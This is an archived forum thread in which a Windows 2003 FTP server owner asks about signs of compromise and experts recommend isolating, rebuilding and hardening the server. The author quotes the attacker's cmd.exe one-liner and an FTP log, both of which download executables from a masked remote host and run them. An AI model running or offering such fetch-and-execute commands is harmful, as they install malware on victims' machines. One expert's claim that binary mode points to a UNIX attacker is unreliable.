Solved

FTP server - possible virus/backdoor/trojan?

Posted on 2006-11-30
8
853 Views
Last Modified: 2013-12-04
I have a standard fully patched Windwos 2003 Server running as an FTP server, I have done a full virus and spywear scan but everyso often I log in va VNC and there will be a command prompt open with the following text:


Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection


This is VERY worrying - and I cant find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?
0
Comment
Question by:STEVEO5
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
8 Comments
 
LVL 11

Expert Comment

by:Kruno Džoić
ID: 18053290
services.msc, and check for services with letters ftp or strange services ( use google to indentify services )
0
 

Author Comment

by:STEVEO5
ID: 18053506
Had a look - couldnt find anythign strange - although i noticed this command in the Start, run dialogue and I didnt type it - any ideas?


cmd.exe /c del i&echo open xx.xx.xxx.xxx 6745 > i&echo user 1 1 >> i &echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit
0
 
LVL 12

Expert Comment

by:Phil_Agcaoili
ID: 18060208
Do you have a firewall in front of this server?
If not, you NEED a fw.
If so, what do the logs say that is going on to/from this FTP server?

I bet someone has compromised your system and is uploading/downloading to/from it based on what you see.

I would:
- Remove this server from the network
- Rebuild this FTP server, patch it and follow an Internet server hardening guide
- Install a network fw in front of it and limit access to the rebuilt  FTP server
- Monitor network activity just in case other systems have been compromised

0
Ransomware-A Revenue Bonanza for Service Providers

Ransomware – malware that gets on your customers’ computers, encrypts their data, and extorts a hefty ransom for the decryption keys – is a surging new threat.  The purpose of this eBook is to educate the reader about ransomware attacks.

 
LVL 9

Expert Comment

by:maninblac1
ID: 18062963
Well, it's difficult for me to tell you exactly what's going on, it sure looks like a hack.

But the thing i can tell you is it's likely the hacker is coming from a computer that is running UNIX

UNIX (and maybe linux as well i'm not 100% sure) ftp requires the connection to enter "BINARY mode" to transfer data, that was a big tip off to me, is that your server is 2003 and yet it is in binary mode something odd for a windows box to my knowledge

Is this a FTP server with logon requied?  If so doesn't windows transmit FTP user/passwords in plain text so a packet sniffer could have sniffed out a login and is now accessing your FTP.

Check your logs for connections and the users who connected you may find your answers there.

In fact either this is a script, or it's definately a hack, the command flags indicate suspicious behavour, running the command then closing the prompt "cmd.exe /c" then he get's a file 870.exe off of a remote sever.  Then he does "ftp -n -s" supresses the login and runs the executable with the -s command, then exits the command.

I'd say look for the file 870.exe but it appears that he deletes it before he leaves.  I'd beef up security definately.
0
 

Author Comment

by:STEVEO5
ID: 18066971
Server is behind a router/firewall.

Can you advise on a server hardening guide?

My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet
0
 
LVL 12

Accepted Solution

by:
Phil_Agcaoili earned 500 total points
ID: 18074621
Follow the 2003 server hardening guides here: http://support.microsoft.com/default.aspx/kb/885409

Ok, did you verify that the firewall is only allowing access to the FTP service on this server?
If not, you need to scan your server from the Net and verify that you're only serving FTP.

This was troubling and also part of why you were just hacked:
"My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet"

Anything on a network and especially something connected to the Internet requires authentication.

Anonymous access access to FTP is somewhat fine these days, but access to virtual directories should always be authenticated.
0
 
LVL 1

Expert Comment

by:Computer101
ID: 21101050
Forced accept.

Computer101
EE Admin
0

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This is a guide to the following problem (not exclusive but here) on Windows: Users need our support and we supporters often use global administrative accounts to do this. Using these accounts safely is a real challenge. Any admin who takes se…
Users of Windows 10 Professional can disable automatic reboots using the policy editor. This tool is not included in the Windows home edition. But don't worry! Follow the instructions below to install (a Win7) policy editor on your Windows 10 Home e…
Monitoring a network: how to monitor network services and why? Michael Kulchisky, MCSE, MCSA, MCP, VTSP, VSP, CCSP outlines the philosophy behind service monitoring and why a handshake validation is critical in network monitoring. Software utilized …
This is my first video review of Microsoft Bookings, I will be doing a part two with a bit more information, but wanted to get this out to you folks.
Suggested Courses

623 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question